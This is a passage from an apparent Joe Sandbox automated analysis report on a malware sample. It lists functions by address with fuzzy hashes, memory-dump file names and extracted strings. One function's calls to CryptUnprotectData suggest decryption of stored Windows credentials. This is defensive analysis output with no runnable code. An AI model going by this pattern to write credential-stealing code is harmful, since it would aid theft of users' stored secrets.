                          • Instruction Fuzzy Hash: 8D410971A00A289FDB24DF58DC94B9BB7B4BB48702F4081D8E608EB2D0E7716E85CF50
                          Function 00919B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00919B84
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00919BA3
                          • LocalFree.KERNEL32(?), ref: 00919BD3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: 0d5e605b65411885da704e0d51e0229b8e585bdb40dfcc7a03836da678c5fee9
                          • Instruction ID: 0e7f795ddac9a8f5ca202a2273e8c477e0e34903bb0f6f506466ffbffbc4b6d2
                          • Opcode Fuzzy Hash: 0d5e605b65411885da704e0d51e0229b8e585bdb40dfcc7a03836da678c5fee9
                          • Instruction Fuzzy Hash: 9F11C9B8A00209EFDB04DF94D995AAEB7B9FF88301F104598E915A7350D774AE50CFA1
                          Function 00C6248D Relevance: 2.7, Strings: 2, Instructions: 221COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: .'^$Akm
                          • API String ID: 0-839304180
                          • Opcode ID: 5449bc2eb6124dcb0f727e47d95586b825364ae3346b8a6751768cd350023aee
                          • Instruction ID: 0ea125c542fd34477d324922759ac6cc57cbcd4a3828f97a37d725f55071cf86
                          • Opcode Fuzzy Hash: 5449bc2eb6124dcb0f727e47d95586b825364ae3346b8a6751768cd350023aee
                          • Instruction Fuzzy Hash: 266168F3A586044BF318693DDC09776BACADBD0320F1A463DDA99C37C4ED7988018286
                          Function 00C2A927 Relevance: 2.7, Strings: 2, Instructions: 194COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: t<>@$t<>@
                          • API String ID: 0-2757028912
                          • Opcode ID: 35ff50c358b79ec7b41083710085b461f30842b3ec5ec2709dfe246a7ee39d89
                          • Instruction ID: 38c2e6b41d6e7049fc2cf4c407380a666f1d3983cb7f08ca4b14b0ae4dbcb1d8
                          • Opcode Fuzzy Hash: 35ff50c358b79ec7b41083710085b461f30842b3ec5ec2709dfe246a7ee39d89
                          • Instruction Fuzzy Hash: DB5127F36282005FF30C5A2DDD957BA77D7DBD4320F2A863DD684C3B84DA3998054656
                          Function 00B9C936 Relevance: 1.5, Strings: 1, Instructions: 222COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 1!]
                          • API String ID: 0-2263508704
                          • Opcode ID: d22992bc973bee7bfe52fb5b950899175c0b9b4a7351be90c20f95e52e05033a
                          • Instruction ID: 0a5c860972280ca0ed32d2bd3941a36d2ec790449e2ad0ab1a047512d82396d4
                          • Opcode Fuzzy Hash: d22992bc973bee7bfe52fb5b950899175c0b9b4a7351be90c20f95e52e05033a
                          • Instruction Fuzzy Hash: 3D71D7F3A082009BF714AE2CDC8676AB7E5EF94710F1A853DDBC8C3784E93959158686
                          Function 00BB397A Relevance: 1.4, Strings: 1, Instructions: 181COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: _}d
                          • API String ID: 0-1223627365
                          • Opcode ID: 06858ca55e2d1e53677e451f361fcb00e151fded85b0a9d90d231c1614fb418b
                          • Instruction ID: 34ba9f36d0864b722c8e1f461fd4ca4fc8b59355d269101b3fc6c169e6f8d916
                          • Opcode Fuzzy Hash: 06858ca55e2d1e53677e451f361fcb00e151fded85b0a9d90d231c1614fb418b
                          • Instruction Fuzzy Hash: 065139B3E081205FE3086A6DDC097BBBBDADBD4660F1B463EDD8593784D8751C0482C6
                          Function 00C10F57 Relevance: 1.4, Strings: 1, Instructions: 181COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: aS}
                          • API String ID: 0-4015726027
                          • Opcode ID: 00437aaeff16a0cde72ef56a90c29a8a2b9b0733760ae3763bc30d4dc4c5bce9
                          • Instruction ID: 8bfb53655b53820b6bcd87cc2f2273713cd331d09916f0db2b11c7ec7d4e0a21
                          • Opcode Fuzzy Hash: 00437aaeff16a0cde72ef56a90c29a8a2b9b0733760ae3763bc30d4dc4c5bce9
                          • Instruction Fuzzy Hash: FC5144F36483089FE308AD7CED9973ABBC4D744624F59063DFA81C7B84F93999058246
                          Function 00B8860C Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Q)a.
                          • API String ID: 0-3310984605
                          • Opcode ID: d8b18c8d17f148ca8c36ffbd6681d40bc52b153cc18df912ec3153635cdcf9f5
                          • Instruction ID: 190e267fa0cc54ae7cdfa8a6640a27370e3e6590b1c928cc0437245ea472685f
                          • Opcode Fuzzy Hash: d8b18c8d17f148ca8c36ffbd6681d40bc52b153cc18df912ec3153635cdcf9f5
                          • Instruction Fuzzy Hash: 814107F7A182185FE7007A2DDC427BAB3D9DBD4721F0B453DE794C3B44EA399801869A
                          Function 00BF3E4A Relevance: .2, Instructions: 176COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 06f4954965d12f3af7bfbaaf16673c17ea1b6fd4994170f835b1cf65051e54d5
                          • Instruction ID: b5e4e2a57a454a62e03fac032df91a58bb72bd879e46d8047cadf6c3d1365871
                          • Opcode Fuzzy Hash: 06f4954965d12f3af7bfbaaf16673c17ea1b6fd4994170f835b1cf65051e54d5
                          • Instruction Fuzzy Hash: DA51E9B3A0C3109FE3046E29DC8577ABBE5EF94320F1A493EE6C5C3780E97958454796
                          Function 00BA8D08 Relevance: .2, Instructions: 175COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5b95df0a3be28a8334b375fe91ac547f8717f38cf6467944ab754491b4c299d4
                          • Instruction ID: fb0156cbc8fa1d4a59ad9507820dacef4f4283b3fe6e9c2fedf1184518623022
                          • Opcode Fuzzy Hash: 5b95df0a3be28a8334b375fe91ac547f8717f38cf6467944ab754491b4c299d4
                          • Instruction Fuzzy Hash: 7C5139F3A083005FE3086E39ED9973ABAD5DB84324F17063DEA85C3784ED7948018686
                          Function 00B94BE1 Relevance: .2, Instructions: 160COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6c109536606018681fdae8973696843452f85a0beda2b0b74f9a7dee32893f62
                          • Instruction ID: 60e6d7b05e021442d698049caaecffb810b09863820aa484e4235bc2598dbb11
                          • Opcode Fuzzy Hash: 6c109536606018681fdae8973696843452f85a0beda2b0b74f9a7dee32893f62
                          • Instruction Fuzzy Hash: 604138F3E192005BE704692EDC55766BBD79BD8330F3B863DEA94D7388ED3458058285
                          Function 00C60115 Relevance: .2, Instructions: 150COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 782861f511a7d445c6ac3bc383a74a6cf5fc776e6ddf0e899ff9b422d5cc11bb
                          • Instruction ID: 7d17ac5c99a46dbcebea0db4eae327d7deba41f07f73b485ed2c1a923b92c3ea
                          • Opcode Fuzzy Hash: 782861f511a7d445c6ac3bc383a74a6cf5fc776e6ddf0e899ff9b422d5cc11bb
                          • Instruction Fuzzy Hash: ED414BF26085049FE704AE2EEC4176AB7E6FFD4320F168A3DD6C5C3394E97954168683
                          Function 00D5EEA2 Relevance: .1, Instructions: 137COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ae98f08dcd91172ea00b3004cdf2212f3d955746787eee0b8ab340283b07e637
                          • Instruction ID: bf954409ca9fb36b8996f44bdd99f58f194ae72f67dfabff5209c2eed066eb56
                          • Opcode Fuzzy Hash: ae98f08dcd91172ea00b3004cdf2212f3d955746787eee0b8ab340283b07e637
                          • Instruction Fuzzy Hash: 624194F39082149BD3186E29DC567BAFBE5EF48320F06052EEAC583790EA3508108BD6
                          Function 00929750 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
